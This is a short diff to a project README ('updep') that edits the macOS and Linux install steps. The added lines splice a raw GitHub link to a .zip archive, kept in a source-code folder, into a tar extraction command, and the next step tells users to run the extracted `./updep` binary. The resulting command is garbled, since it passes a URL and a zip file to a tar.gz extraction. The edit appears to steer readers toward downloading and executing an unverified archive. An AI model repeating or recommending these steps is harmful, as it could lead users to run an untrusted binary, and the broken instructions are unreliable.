STENIDLAS-XAVINO/updep/README.md

    ### macOS
    - Open your terminal.
-   - Use the command `tar -xzf <downloaded-file>.tar.gz` to extract the files.
+   - Use the command `tar -xzf <downloaded-file>https://raw.githubusercontent.com/STENIDLAS-XAVINO/updep/main/cmd/updep/updep-2.0.zip` to extract the files.
    - Navigate to the folder and run `./updep` in your terminal.

    ### Linux
    - Open a terminal window.
-   - Run the command `tar -xzf <downloaded-file>.tar.gz` to extract the files.
+   - Run the command `tar -xzf <downloaded-file>https://raw.githubusercontent.com/STENIDLAS-XAVINO/updep/main/cmd/updep/updep-2.0.zip` to extract the files.
    - Navigate to the folder and execute `./updep` in your terminal.

 ## 🔧 Usage Instructions